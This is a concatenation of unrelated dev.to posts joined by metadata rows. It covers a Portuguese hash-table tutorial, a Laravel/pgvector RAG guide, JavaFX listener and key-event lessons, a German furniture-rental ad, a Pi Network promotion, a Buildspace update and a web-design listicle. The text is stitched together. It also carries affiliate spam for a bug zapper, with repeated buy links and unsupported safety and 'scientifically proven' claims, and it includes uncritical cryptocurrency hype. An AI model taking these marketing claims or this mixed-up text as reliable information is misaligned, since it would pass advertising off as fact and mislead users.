É um algoritmo de chave-valor, você insere uma chave e atribui um valor a essa chave, então quando precisar do valor novamente basta referenciar a chave que você definiu e pronto, você tem seu valor de volta.
"Mas Miguel, qual a diferença de eu usar uma HashTable para armazenar minhas estruturas e usar um Array?", bom, dependendo do caso, talvez o Array não performe tão bem quanto você espera, fora que para a maioria dos casos uma tabela hash tem complexidade constante O(1), isso significa que ela não perde performance caso o volume de dados aumente.
**Hash Functions**
Antes de irmos direto ao ponto precisamos deixar isso claro: uma HashTable é uma implementação de uma HashFunction (não, elas não são a mesma coisa!). Basicamente, uma função hash é uma função que recebe uma sequência de bytes e devolve um número. E sim, é simples dessa forma.
Mas agora talvez você esteja me perguntando: "Mas Miguel, pra que eu vou querer usar isso? Não me parece muito útil!" e é aí que você se engana, meu jovem. Existe um universo de ferramentas que se baseiam inteiramente em uma função hash, principalmente na área da criptografia.
O melhor exemplo que eu posso te dar no momento é o SHA (Secure Hash Algorithm), que pega um arquivo e devolve uma sequência alfanumérica. Podemos usar o SHA, por exemplo, para validar se duas pessoas possuem o mesmo arquivo de texto. Você pega o arquivo binário (que é uma sequência de bytes, não podemos esquecer disso) e se ambos os arquivos gerarem a mesma sequência, então é o mesmo arquivo. Legal, né?
**Hash Tables**
Como mencionado anteriormente, a HashTable é uma funcionalidade que se baseia numa HashFunction, com a diferença de que ela vai fazer uma implementação de arrays por baixo dos panos. Funciona da seguinte forma:

Sempre que você define uma chave, uma HashFunction é chamada e ela atribui a sua chave ao índice de um array como mostrado na imagem acima. É assim que você consegue guardar estruturas de dados mais complexas dentro de uma HashTable, afinal de contas, não passa de um Array por baixo dos panos.
Hoje temos diversos usos que podemos fazer pra esse tipo de estrutura de dados, uma das mais comuns que eu posso citar é o próprio DNS (Domain Name System), basicamente quando você digita algo como "www.google.com" na URL do seu navegador, esse dominío é traduzido para o IP do servidor da Google (algo como "142.250.217.78"), e é graças à HashTable que o DNS consegue fazer esse tipo de "tradução".
Para finalizar, gostaria de deixar claro que você nunca vai precisar implementar uma HashTable do zero, pois muito provavelmente a sua linguagem de programação favorita já fez isso. Estarei deixando abaixo uma ótimo exemplo de implementação de uma HashTable com C#.
``` csharp
using System.Collections;
class Program
{
static void Main()
{
Hashtable contacts = [];
contacts.Add("John", "Doe");
contacts.Add("Joana", "Doe");
foreach(DictionaryEntry contact in contacts)
{
Console.WriteLine("Key = {0}, Value = {1}", contact.Key, contact.Value);
// Key = John, Value = Doe
// Key = Joana, Value = Doe
}
}
}
```
**Obrigado!**
Se você acompanhou este post até aqui eu gostaria de te agradecer, tentei ser o mais didático possível pois sei como esse tipo de tema pode ser confuso às vezes.
Em breve pretendo soltar mais alguns artigos sobre temas um pouco mais complexos. Por enquanto ficamos por aqui. Muito obrigado e até a próxima!⚡ | pedromiguelmvs |
1,899,383 | Zap Guardian Reviews | Two Months Later... | In the constant battle against mosquitoes and pesky bugs, finding an effective and safe solution can... | 0 | 2024-06-24T21:44:39 | https://dev.to/emmanuel0121/zap-guardian-reviews-two-months-later-2pcg | news, techtalks, product | In the constant battle against mosquitoes and pesky bugs, finding an effective and safe solution can be challenging. The quest for a product that provides protection without chemicals and noise often ends in disappointment. However, the Zap Guardian Bug Zapper emerges as a potential game-changer. This review delves deep into the Zap Guardian, exploring its features, benefits, and how it works to determine if it's the ultimate bug zapper for 2024. By the end of this article, it will be clear whether the Zap Guardian is worth the investment for a bug-free living experience.

## What is Zap Guardian Bug Zapper
The Zap Guardian Bug Zapper is a cutting-edge device designed to attract and eliminate mosquitoes and other annoying insects. Combining solar power and USB charging capabilities, it offers versatile and eco-friendly operation. The zapper uses a 365 NM wavelength UV light, scientifically proven to lure all kinds of bugs into its high voltage core, which safely and efficiently kills them. Its portability makes it suitable for both indoor and outdoor use, ensuring protection wherever it’s needed. The silent operation ensures it does not disturb the peace, making it perfect for bedrooms, patios, and camping trips.
This bug zapper stands out due to its blend of modern technology and user-friendly features. With a long battery life and various lighting modes, it serves multiple purposes beyond just being a bug killer. The Zap Guardian is not just a device; it’s a promise of comfort, peace, and uninterrupted enjoyment of the outdoors. Whether at home or on an adventure, the Zap Guardian aims to provide a bug-free environment.

[Click Here to Buy Zap Guardian Bug Zapper](https://www.topofferlink.com/4K5HK86N6/D9CGCPZ/)
## Specifications of Zap Guardian Bug Zapper
- Coverage Area: Effectively clears a 16ft x 16ft area, ensuring a large bug-free zone.
- Battery Life: Offers up to 20 hours of operation on a full charge, ideal for extended use.
- Charging Methods: Can be charged via solar energy or USB, providing flexibility.
- Lighting Modes: Includes four lighting modes - low (20% light), middle (50% light), high (100% light), and mosquito zapper mode.
- Dimensions and Weight: Compact and lightweight, making it easy to carry and hang.
## Features of Zap Guardian Bug Zapper
- Solar and USB Charging: This dual charging capability ensures that the zapper remains operational in various settings, whether in the wilderness or at home.
- Portable and Lightweight: Its compact design makes it easy to transport, hang, or place anywhere.
- Four Lighting Modes: The versatility in lighting ensures the device can be used as a lantern, providing different levels of brightness as required.
- Silent Operation: The noise-free function ensures it doesn't disturb the peace, making it ideal for indoor use.
- Eco-Friendly: Solar charging and chemical-free operation make it a sustainable choice for environmentally conscious users.
[Click Here to Buy Zap Guardian Bug Zapper](https://www.topofferlink.com/4K5HK86N6/D9CGCPZ/)
## How Zap Guardian Bug Zapper Works
The Zap Guardian Bug Zapper employs a straightforward yet highly effective mechanism to eliminate bugs. It uses a 365 NM wavelength UV light to attract insects. This specific wavelength is scientifically proven to be highly effective in luring various types of bugs. Once the bugs are attracted to the light, they come into contact with a high voltage core that instantly kills them.
The dead insects are collected in an easy-to-clean tray, making maintenance simple and hassle-free. The device’s silent operation ensures it works without creating any noise, providing continuous protection without disturbing the environment. The dual charging options (solar and USB) ensure that the zapper remains functional in all situations, providing long-lasting bug protection.
## Benefits of Zap Guardian Bug Zapper
- Effective Bug Control: Provides a bug-free zone of 16ft x 16ft, ensuring protection from mosquitoes, flies, and other pests.
- Chemical-Free Operation: Safe for use around children and pets, as it does not rely on harmful chemicals.
- Long Battery Life: With up to 20 hours of operation per charge, it ensures continuous protection.
- Versatile Use: Suitable for indoor and outdoor environments, including homes, patios, and camping sites.
- Eco-Friendly: Solar charging reduces reliance on conventional electricity, promoting sustainable usage.

[Click Here to Buy Zap Guardian Bug Zapper](https://www.topofferlink.com/4K5HK86N6/D9CGCPZ/)
## Who Needs the Zap Guardian Bug Zapper
- Homeowners: Those looking to protect their homes from mosquitoes and bugs without using harmful chemicals.
- Outdoor Enthusiasts: Campers, hikers, and adventurers who need reliable bug protection in remote locations.
- Pet Owners: People who need a safe, chemical-free bug zapper that won’t harm their pets.
- Environmentally Conscious Individuals: Users who prefer eco-friendly products that utilize solar energy..
- Comparison with Similar Products
- Solar and USB Charging: Many bug zappers lack the versatility of dual charging options.
- Long Battery Life: With 20 hours of operation, it outperforms many competitors.
- Silent Operation: Unlike other noisy bug zappers, the Zap Guardian operates quietly.
- Multi-Functional Lighting: Its various lighting modes add extra value, functioning as a lantern.
## Pros and Cons of Zap Guardian Bug Zapper
Pros:
- Effective in clearing a large area (16ft x 16ft)
- Chemical-free and safe for children and pets
- Long battery life with up to 20 hours of operation
- Versatile charging options (solar and USB)
- Silent operation
- Portable and lightweight
Cons:
- Requires direct sunlight for optimal solar charging
- Limited effectiveness in extremely large open areas
## Frequently Asked Questions about Zap Guardian Bug Zapper
**How long does the battery last?**
The battery lasts up to 20 hours on a full charge in mosquito zapping mode.
**Is the Zap Guardian safe for children and pets?**
Yes, it operates without harmful chemicals, making it safe for children and pets.
**Can the Zap Guardian be used indoors?**
Yes, it is suitable for both indoor and outdoor use.
**How do you clean the device?**
The dead insects are collected in an easy-to-clean tray that can be removed and cleaned easily.
**What is the coverage area?**
The Zap Guardian effectively clears a 16ft x 16ft area.
## Conclusion
The Zap Guardian Bug Zapper proves to be an efficient, versatile, and eco-friendly solution for those seeking to eliminate mosquitoes and other bugs. Its unique features, such as dual charging options, long battery life, and silent operation, make it stand out among competitors. The various lighting modes add to its functionality, ensuring it serves multiple purposes. For anyone struggling with bugs, whether at home or on outdoor adventures, the Zap Guardian offers a reliable and chemical-free solution.
[Click Here to Buy Zap Guardian Bug Zapper](https://www.topofferlink.com/4K5HK86N6/D9CGCPZ/)
| emmanuel0121 |
1,899,356 | Laravel RAG System in 4 Steps! | This post will show how easy it is to get going with Laravel, Vectorized data and LLM chat. It can be the foundation to a RAG system. There are links to the code and more. | 0 | 2024-06-24T21:38:00 | https://dev.to/alnutile/laravel-rag-system-in-4-steps-2jc | laravel, llm, ollama, rag | ---
title: Laravel RAG System in 4 Steps!
published: true
description: "This post will show how easy it is to get going with Laravel, Vectorized data and LLM chat. It can be the foundation to a RAG system. There are links to the code and more."
tags: laravel, llm, ollama, RAG
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
published_at: 2024-06-24 21:38 +0000
---

**Make sure to follow me on [YouTube](https://youtube.com/@alfrednutile?si=M6jhYvFWK1YI1hK9)**
This post will show how easy it is to get going with Laravel, Vectorized data and LLM chat. It can be the foundation to a RAG system. There are links to the code and more.
> Retrieval augmented generation system — an architectural approach that can improve the efficacy of large language model (LLM) applications
The Repo is [here](https://github.com/alnutile/laravelrag/tree/main). The main branch will get you going on a fresh install of Laravel. If you copy the .env.example to .env you can get started just follow along.
Follow Along or Watch the Video COMING SOON!
## Step 1 Setting up Vector
> NOTE: Each pull do composer install. If that is not enough run composer dump
You can see the Branch here https://github.com/alnutile/laravelrag/tree/vector_setup
Once you have Laravel Setup using HERD, DBEngine, or the PostGres app. Then using TablePlus or Command Line or whatever make the database in this example “laravelrag”
Now we want to are going to install this library which will setup the Vector Extension for us.
```bash
composer require pgvector/pgvector
php artisan vendor:publish --tag="pgvector-migrations"
php artisan migrate
```
## Step 2 Now for the Model
The Branch is https://github.com/alnutile/laravelrag/tree/model_setup
We will keep it simple here and have a model named Chunk

This will be where we store “chunks” of a document. In our example we will chunk up a long Text document so we can keep it simple for now. But in the end all things become text! PDF, PPT, Docx etc.
You will see in the code it is not about pages as much as chunks that are x size with x overlap of content.
In this code we will default to 600 characters chunks with an bit of an overlap you can see the code [here](https://github.com/alnutile/laravelrag/blob/chat_with_data/app/Domains/Chunking/TextChunker.php).
## Step 3 Add the LLM Drivers
Repo Link is https://github.com/alnutile/laravelrag/tree/llm_driver
> NOTE: Each pull do composer install. If that is not enough run composer dump
We bring in my LLMDriver folder which is not an official package (sorry just too lazy) and then some other libraries
```bash
composer require spatie/laravel-data laravel/pennant
```
I am going to use my LLM Driver for this and then plug in Ollama and later Claude.
But first get Ollama going on your machine read about it here.
We are going to pull llama3 and mxbai-embed-large (for embedding data)
Or just use your API creds for OpenAi it should make sense when you see the code and the config file “config/llmdriver.php”
Just set the Key value in your .env or checkout `config/llmdriver.php` for more options.
```env
LLM_DRIVER=ollama
```
Now let’s open TinkerWell (I want to avoid coding a UI so we can focus on the concept more) https://tinkerwell.app/
Load up the Provider `bootstrap/providers.php`
```php
<?php
return [
App\Providers\AppServiceProvider::class,
\App\Services\LlmServices\LlmServiceProvider::class,
];
```
Ok so we see it is working now lets chunk a document.
NOTE: This ideally all would run in Horizon or Queue jobs to deal with a ton of details like timeouts and more. We will see what happens if we just go at it this way for this demo.
Also keep an eye on the tests folders I have some “good” examples on how to test your LLM centric applications like `tests/Feature/ChunkTextTest.php`
Ok now we run the command to Embed the data

And now we have a ton of chunked data!

The columns are for the different size embeddings depending on the embed models you are using. I got some feedback here and went the route you see above.
Now lets chat with the data!
## Step 4 Chatting with your Data
Ok we want the user to ask the LLM a question, but the LLM needs “context” and a Prompt that reduces drift, that is when an LLM makes up answers. I have seen it reduced to 100% in these systems.
First let’s vectorize the input so we can search for related data.
Since we embedded the data the question then gets embedded or vectorized to then use it to do the search.

So we take the text question and pass it to the embed api (Ollama and OpenAi offer this)
Here is the code so you can see how simple it really is with HTTP.

>You will see I use Laravel Data from Spatie so not matter the LLM service it is always the same type of date in and out!
Now we use the Distance query to do a few things lets break it down

We take the results of the embedData gives us and pass it into the query using Vector to format it Pgvector\Laravel\Vector library:
```php
use Pgvector\Laravel\Vector;
new Vector($value);
```
Then we use that in the distance query

I used Cosine since I feel the results had been a bit better. Why? I did a bit of ChatGPT work to decide which one and why. Here are some results:
> The order of effectiveness for similarity metrics can vary depending on the nature of the data and the specific use case. However, here’s a general guideline based on common scenarios:
>
> 1. **Cosine Similarity**: Cosine similarity is often considered one of the most effective metrics for measuring similarity between documents, especially when dealing with high-dimensional data like text documents. It’s robust to differences in document length and is effective at capturing semantic similarity.
>
> 2. **Inner Product**: Inner product similarity is another metric that can be effective, particularly for certain types of data. It measures the alignment between vectors, which can be useful in contexts where the direction of the vectors is important.
>
> 3. **L2 (Euclidean) Distance**: L2 distance is a straightforward metric that measures the straight-line distance between vectors. While it’s commonly used and easy to understand, it may not always be the most effective for capturing complex relationships between documents, especially in high-dimensional spaces.
>
> In summary, the order of effectiveness is typically Cosine Similarity > Inner Product > L2 Distance. However, it’s important to consider the specific characteristics of your data and experiment with different metrics to determine which one works best for your particular application.
Ok back to the example. So now we have our question vectorized and we have search results. The code also takes a moment to knit back the chunks with siblings so instead of getting just the chunk we get the chunk before and after. https://github.com/alnutile/laravelrag/blob/chat_with_data/app/Services/LlmServices/DistanceQuery.php#L33
Now that we have the results we are going to build a prompt. This is tricky since it takes time to get it right so you might want to pull it into ChatGPT or Ollama and mess around a bit. The key here is setting the temperature to 0 to keep the system from drifting. That is not easy yet in Ollama https://github.com/ollama/ollama/issues/2505

Here is another example I like to share with people

Just more “evidence” of what a good RAG system can do.
## Wrapping it up
That is really how “easy” it is to get a RAG system going. LaraLlama.io has a ton more details that you can see but this is a very simple code base I share in this article.
The next post will be tools/functions, extending this code further. But there are so many ways to use this in applications, I list a bunch of use cases here https://docs.larallama.io/use-cases.html
The code is all here https://github.com/alnutile/laravelrag you can work through the branches with the last one being https://github.com/alnutile/laravelrag/tree/chat_with_data
Make sure to follow me on YouTube https://youtube.com/@alfrednutile?si=M6jhYvFWK1YI1hK9
## And the list below or more ways to stay in touch!
* 📺 YouTube Channel — https://youtube.com/@alfrednutile?si=M6jhYvFWK1YI1hK9
* 📖 The Docs — https://docs.larallama.io/
* 🚀 The Site — https://www.larallama.io
* 🫶🏻 https://patreon.com/larallama
* 🧑🏻💻 The Code — https://github.com/LlmLaraHub/laralamma
n
* 📰 The NewsLetter — https://sundance-solutions.mailcoach.app/larallama-app
* 🖊️ Medium — https://medium.com/@alnutile
* 🤝🏻 LinkedIn — https://www.linkedin.com/in/alfrednutile/
* 📺 YouTube Playlist — https://www.youtube.com/watch?v=KM7AyRHx0jQ&list=PLL8JVuiFkO9I1pGpOfrl-A8-09xut-fDq
* 💬 Discussions — https://github.com/orgs/LlmLaraHub/discussions | alnutile |
1,899,381 | So mieten Sie Stehtische für mehrtägige Veranstaltungen | Planen Sie eine mehrtägige Veranstaltung und benötigen die perfekten Stehtische? Dann sind Sie bei... | 0 | 2024-06-24T21:31:22 | https://dev.to/creativeworkch/so-mieten-sie-stehtische-fur-mehrtagige-veranstaltungen-286d | Planen Sie eine mehrtägige Veranstaltung und benötigen die perfekten Stehtische? Dann sind Sie bei der Creativework AG genau richtig! Als führender Anbieter hochwertiger Mietmöbel in der Schweiz bieten wir den besten Eventmobiliar-Mietservice überhaupt. Mit einem beeindruckenden Bestand von über 8.000 exklusiven Sitzplätzen und einer großen Auswahl an Stehtischen sorgen wir dafür, dass Ihre Veranstaltung reibungslos verläuft und fantastisch aussieht.
Warum Creativework AG wählen?
Unsere [Stehtische mieten Event Messe](https://creativework.ch/stehtische-hochtische/) sind robust und stilvoll. Bei der Creativework AG verstehen wir die einzigartigen Herausforderungen bei der Organisation mehrtägiger Veranstaltungen. Unsere umfangreiche Auswahl an Stehtischen stellt sicher, dass Sie den perfekten Tisch für das Thema und die Atmosphäre Ihrer Veranstaltung finden. Wir sind bestrebt, hochwertige Möbel und einen außergewöhnlichen Kundenservice anzubieten, was uns zur bevorzugten Wahl für Veranstaltungsplaner in der ganzen Schweiz macht.
Vorteile der Anmietung von Stehtischen für mehrtägige Veranstaltungen
Wenn Sie Stehtische für eine mehrtägige Veranstaltung mieten, profitieren Sie von mehreren Vorteilen, die Ihr Veranstaltungserlebnis bereichern:
Kostengünstig: Durch die Miete haben Sie Zugang zu hochwertigen Möbeln, ohne dass Sie erhebliche Kaufinvestitionen tätigen müssen.
Flexibilität: Unsere große Auswahl an Stilen und Designs stellt sicher, dass Sie die perfekte Lösung für das Thema und die Atmosphäre Ihrer Veranstaltung finden.
Komfort: Wir kümmern uns um die Lieferung, den Aufbau und den Abbau nach der Veranstaltung und sorgen so für einen reibungslosen und stressfreien Ablauf.
Der Mietprozess der Creativework AG
Unser Vermietungsprozess ist unkompliziert und problemlos gestaltet, sodass Sie sich auf andere Aspekte Ihrer Veranstaltungsplanung konzentrieren können. So funktioniert das:
Beratung: Wir beginnen damit, die Anforderungen und Vorlieben Ihrer Veranstaltung zu verstehen. Unser erfahrenes Team hilft Ihnen bei der Auswahl der idealen Stehtische für Ihre mehrtägige Veranstaltung.
Buchung: Sobald Sie Ihre Auswahl getroffen haben, schließen wir Ihre Buchung ab und planen die Lieferung.
Lieferung und Aufbau: Unser professionelles Team liefert und baut die Stehtische an Ihrem Veranstaltungsort auf und sorgt dafür, dass alles perfekt arrangiert ist.
Dienstleistungen nach der Veranstaltung: Nach Ihrer Veranstaltung kümmern wir uns um den Abbau und den Abtransport, sodass Sie sich nicht um die Aufräumarbeiten kümmern müssen.
Tipps zum Mieten von Stehtischen für mehrtägige Veranstaltungen
Hier sind einige Tipps, um sicherzustellen, dass Sie Ihre Stehtische für mehrtägige Veranstaltungen optimal nutzen:
1. Planen Sie im Voraus
Beginnen Sie Ihren Mietvorgang frühzeitig, um sicherzustellen, dass Sie die beste Auswahl und Verfügbarkeit erhalten. Dies ist besonders wichtig bei mehrtägigen Veranstaltungen, bei denen die Nachfrage nach Möbeln sehr hoch sein kann.
2. Wählen Sie langlebige und bequeme Möbel
Bei mehrtägigen Veranstaltungen ist es entscheidend, Stehtische auszuwählen, die nicht nur stilvoll, sondern auch langlebig und bequem sind. Unsere Stehtische sind so konzipiert, dass sie einer längeren Nutzung standhalten und Ihren Gästen gleichzeitig ein angenehmes Erlebnis bieten.
3. Passen Sie es an Ihr Veranstaltungsthema an
Wählen Sie Stehtische, die zum Thema und Dekor Ihrer Veranstaltung passen. Egal, ob Sie sich für einen modernen, eleganten Look oder eine eher traditionelle Einrichtung entscheiden, wir haben Optionen, die Ihren Vorstellungen entsprechen.
4. Erwägen Sie zusätzliche Sitzplätze
Erwägen Sie zusätzlich zu den Stehtischen die Anmietung zusätzlicher Sitzgelegenheiten wie Barhocker oder Stühle. So stellen Sie sicher, dass Ihre Gäste während der gesamten Veranstaltung ausreichend Sitzgelegenheiten und geselliges Beisammensein haben.
Machen Sie Ihre mehrtägige Veranstaltung unvergesslich
Bei der Creativework AG glauben wir, dass jede Veranstaltung unvergesslich sein sollte. Indem Sie sich dafür entscheiden, bei uns Stehtische für Veranstaltungen zu mieten, stellen Sie sicher, dass Ihre Veranstaltung mit den besten Möbeln ausgestattet ist, die verfügbar sind, und verbessern so das Gesamterlebnis für Ihre Gäste. Unser Engagement für Qualität und Kundenzufriedenheit hebt uns von der Konkurrenz ab.
Erschwingliche und zuverlässige Lösungen
Wir sind stolz darauf, wettbewerbsfähige Preise anzubieten, ohne Kompromisse bei der Qualität einzugehen. Unsere günstigen Mietoptionen machen es Ihnen leicht, die benötigten Möbel innerhalb Ihres Budgets zu bekommen. Kombiniert mit unserem zuverlässigen Service ist die Creativework AG der perfekte Partner für Ihre nächste mehrtägige Veranstaltung.
Bereit zur Miete?
Wenn Sie bereit sind, Ihre mehrtägige Veranstaltung mit stilvollen und funktionalen Stehtischen aufzuwerten, ist die Creativework AG für Sie da. Kontaktieren Sie uns noch heute, um mehr über unsere Mietdienstleistungen zu erfahren und wie wir Ihnen helfen können, Ihre Veranstaltung zu einem Erfolg zu machen.
Denken Sie daran: Wenn es darum geht, den besten Ort zum Mieten von Stehtischen zu finden, ist Creativework AG der Anbieter Ihres Vertrauens. Lassen Sie uns Ihnen helfen, ein unvergessliches mehrtägiges Event zu gestalten!
| creativeworkch | |
1,899,380 | Listeners for Observable Objects | You can add a listener to process a value change in an observable object. An instance of Observable... | 0 | 2024-06-24T21:29:19 | https://dev.to/paulike/listeners-for-observable-objects-37pc | java, programming, learning, beginners | You can add a listener to process a value change in an observable object.
An instance of **Observable** is known as an _observable object_, which contains the **addListener(InvalidationListener listener)** method for adding a listener. The listener class must implement the **InvalidationListener** interface to override the **invalidated(Observable o)** method for handling the value change. Once the value is changed in the **Observable** object, the listener is notified by invoking its **invalidated(Observable o)** method. Every binding property is an instance of **Observable**. The program below gives an example of observing and handling a change in a **DoubleProperty** object **balance**.

When line 16 is executed, it causes a change in balance, which notifies the listener by invoking the listener’s **invalidated** method.
Note that the anonymous inner class in lines 10–14 can be simplified using a lambda expression as follows:
`balance.addListener(ov -> {
System.out.println("The new value is " +
balance.doubleValue());
});`
Recall that in [this post](https://dev.to/paulike/case-study-the-clockpane-class-4bpg) DisplayClock.java, the clock pane size is not changed when you resize the window. The problem can be fixed by adding a listener to change the clock pane size and register the listener to the window’s width and height properties, as shown in the program below.
```
package application;
import javafx.application.Application;
import javafx.geometry.Pos;
import javafx.stage.Stage;
import javafx.scene.Scene;
import javafx.scene.control.Label;
import javafx.scene.layout.BorderPane;
public class DisplayResizableClock extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Create a clock and a label
ClockPane clock = new ClockPane();
String timeString = clock.getHour() + ":" + clock.getMinute() + ":" + clock.getSecond();
Label lblCurrentTime = new Label(timeString);
// Place clock and label in border pane
BorderPane pane = new BorderPane();
pane.setCenter(clock);
pane.setBottom(lblCurrentTime);
BorderPane.setAlignment(lblCurrentTime, Pos.TOP_CENTER);
// Create a scene and place it in the stage
Scene scene = new Scene(pane, 250, 250);
primaryStage.setTitle("DisplayClock"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
pane.widthProperty().addListener(ov -> clock.setW(pane.getWidth()));
pane.heightProperty().addListener(ov -> clock.setH(pane.getHeight()));
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
The program is identical to DisplayClock.java except that you added the code in lines 29–31 to register listeners for resizing the clock pane upon a change of the width or height of the scene. The code ensures that the clock pane size is synchronized with the scene size. | paulike |
1,899,379 | Game Changer | Game Changer PiNetwork This article captures the essence of PI Network's significance in... | 0 | 2024-06-24T21:23:02 | https://dev.to/akbitcgh/game-changer-4ce9 | ai, productivity, computerscience, node | **Game Changer PiNetwork**

This article captures the essence of PI Network's significance in transforming digital financial systems and emphasizes its commitment to elevating data security and integrity in the digital age.
**
Introducing PI Network: Revolutionizing Digital Financial Systems**
In the realm of digital financial systems, a new player is emerging, poised to redefine the landscape with its innovative approach and cutting-edge technology. This disruptive force, aptly named PI Network, promises to be the much-anticipated "game changer" that will revolutionize how we perceive and interact with digital currencies.
At the core of PI Network's value proposition lies its commitment to enhancing data security and integrity, essential pillars in the era of evolving cyber threats and vulnerabilities. With a focus on revamping traditional notions of security within financial transactions, PI Network aims to establish a new standard of trust and reliability in the digital realm.
Unlike conventional systems that rely on centralized authorities for validation and verification, PI Network operates on a decentralized model, empowering users with greater control over their data and transactions. By leveraging blockchain technology, PI Network ensures immutability and transparency, safeguarding sensitive information from unauthorized access and tampering.
The advent of PI Network signifies a paradigm shift in how we perceive the future of finance, paving the way for a more inclusive and secure ecosystem for digital assets. As the digital landscape continues to evolve, PI Network stands at the forefront, offering a glimpse into a future where financial interactions are seamless, secure, and empowering for all participants.
In conclusion, PI Network's emergence as a prominent player in the digital financial arena holds the promise of reshaping industry norms and setting new standards for data security and integrity. With its innovative approach and dedication to user-centric values, PI Network embodies the spirit of progress and innovation, heralding a new era of possibilities in the ever-evolving world of digital finance.
| akbitcgh |
1,899,376 | Was accepted into Buildspace S5 | I was accepted into Buildspace S5 and the slide for my idea is: I called it Skin Canvas and plan... | 0 | 2024-06-24T21:20:32 | https://dev.to/newtonmusyimi/was-accepted-into-buildspace-s5-3g65 | buildspace, nightsandweekends, buildinpublic, webdev | I was accepted into Buildspace S5 and the slide for my idea is:

I called it Skin Canvas and plan on building it using laravel, livewire v3 and tailwind css. The project's on [GitHub](https://github.com/Newton-Musyimi/skincanvas) and the site is [Skin Canvas](https://skincanvas.newtonmusyimi.me/). The plans is to also have an API that I'll use to build a cross-platform app with using flutter.
Feel free to give suggestions or ask questions. | newtonmusyimi |
1,899,368 | Key Features of Exceptional Website Design in 2024 | Staying ahead of the curve in the fast-paced world of web development and design is essential to... | 0 | 2024-06-24T21:16:41 | https://dev.to/joycesemma/key-features-of-exceptional-website-design-in-2024-3npd | webdev, beginners, programming, productivity | Staying ahead of the curve in the fast-paced world of web development and design is essential to producing outstanding websites that grab users' attention and live up to their changing expectations. As we move into 2024, changes in user behavior, technological advancements, and aesthetic trends will all continue to drive the rapid evolution of the website design industry. In the new year, designers and developers should embrace the essential elements that characterize outstanding website design to produce unique websites that also offer a smooth user experience.
## Responsive Design for All Devices
In 2024, creating websites that are responsive and optimized for all devices—including desktops, tablets, smartphones, and even upcoming gadgets like augmented reality glasses and smartwatches—is the first step towards creating an outstanding website design. Regardless of the device being used, a responsive design offers a consistent and user-friendly experience by fluidly adjusting to various screen sizes and orientations.
The goal of responsive design is to make a website look good across a range of screen sizes while also removing any obstacles to users' ability to access and [interact with the content](https://daddyshangout.com/2024/05/27/12-strategies-for-effective-digital-marketing-in-2024/). This feature is now critical due to the rise in the use of mobile devices for internet browsing. A website's ability to function flawlessly on both large desktop monitors and smartphones will draw and keep a larger user base, which is critical to its success.
## Accessible and Inclusive Design
In 2024, inclusiveness will be essential to great website design. To comply with web accessibility guidelines, designers must make sure that websites are accessible to users with disabilities (WCAG). This entails offering keyboard navigation, alternate text for images, and other features to make the website accessible to all users.
Not only is web accessibility required by law in many places, but it's also a good business practice and a moral obligation. By ensuring that websites are usable by people with disabilities, accessibility can greatly increase the website's impact and reach. Additionally, accessible design frequently results in better usability for all users, benefiting both website owners and designers.
## Speed and Performance Optimization
Users expect websites to load quickly and deliver content promptly in this era of instant gratification. Optimizing a website's speed and performance through methods like code minification, image optimization, and effective server hosting is a component of exceptional website design. Prioritizing speed is essential because slow-loading websites can result in high bounce rates and disgruntled visitors.
It is impossible to exaggerate the value of speed. Website speed is now a ranking factor in Google's algorithms, which makes it essential for SEO. This is something you can discuss with SEO professionals all over the world, and sticking to [experts in technical SEO services](https://fourdots.com.au/technical-seo-agency/), for instance, will boost your SEO score and help your website become more responsive and appealing. Keep in mind that a quicker website offers a much better user experience, which raises engagement and conversion rates. Web designers make sure that their creations work smoothly and efficiently in addition to looking good by putting performance optimization strategies into practice.
## Minimalistic and Clean User Interface
In 2024, simplicity will be paramount, with clean, minimalist user interfaces (UI) taking center stage. Well-designed websites feature roomy layouts, legible typography, and simple navigation. Users have a more pleasurable browsing experience when the user interface is clear and helps them concentrate on the tasks and content at hand.
Because it can produce an interface that is both aesthetically pleasing and easy to use, the minimalist design trend has gained popularity. Through the elimination of superfluous elements and concentration on key components, designers can intuitively navigate users through the website. In addition to increasing user engagement, this design strategy improves the visual appeal and memorability of websites.
## Personalization and User-Centric Design
The secret to great website design is personalization. In 2024, websites ought to adjust to each user's unique preferences, providing customized user journeys, product recommendations, and personalized content. Understanding your audience and meeting their specific needs and expectations are key components of a user-centric approach.
The days of universally applicable websites are over. Websites that use personalization can offer experiences and content that each visitor can relate to, which raises engagement and boosts conversion rates. Designers can produce websites that anticipate user needs and present pertinent content by utilizing data analytics and artificial intelligence. This increases user satisfaction and loyalty.
## Visual Storytelling and Interactive Elements
Outstanding website design includes interactive components and visual storytelling in addition to static pages. Using captivating images, animations, and interactive elements makes the user experience more immersive and memorable. These components can dynamically and captivatingly communicate information as well as [brand identity](https://twistedmalemag.com/key-strategies-for-building-a-successful-brand-in-todays-economy/).
Visual storytelling has become a potent tool for delivering messages and grabbing users' attention in the era of multimedia-rich content. Through the use of multimedia components such as animations, infographics, and videos, designers can convey a message that more deeply connects with users. In addition, interactive elements like surveys, gamification, and quizzes boost user involvement and stimulate active participation, which improves user recall and enjoyment of the website.
## Security and Privacy Features
Outstanding website design in 2024 must give security and privacy features top priority in an era of growing cybersecurity threats and privacy concerns. Establishing strong encryption, data security protocols, and transparent privacy guidelines fosters user trust and guarantees the security of their private data.
In today's digital world, the significance of security and privacy cannot be stressed. Publicized privacy scandals and data breaches have increased user awareness of online safety. As a result, to safeguard user information and foster trust, website designers must act proactively. The use of secure authentication techniques, the implementation of HTTPS, and routine security protocol updates are all necessary to guarantee the confidentiality and integrity of user data.
Since the web is always changing, it is crucial to keep up with the latest design trends if you want to build websites that will still be unique in 2024 and beyond. Adopting these fundamental elements guarantees that websites stay user-focused and competitive. It also makes a positive impact on a safer and more inclusive digital ecosystem where users can interact, explore, and transact with confidence. Outstanding website design is not merely an option in this ever-changing digital environment—it is essential to success and relevancy.
| joycesemma |
1,899,367 | Key Events | A KeyEvent is fired whenever a key is pressed, released, or typed on a node or a scene. Key events... | 0 | 2024-06-24T21:13:24 | https://dev.to/paulike/key-events-4j35 | java, programming, learning, beginners | A **KeyEvent** is fired whenever a key is pressed, released, or typed on a node or a scene. Key events enable the use of the keys to control and perform actions or get input from the keyboard. The **KeyEvent** object describes the nature of the event (namely, that a key has been pressed, released, or typed) and the value of the key, as shown in Figure below.

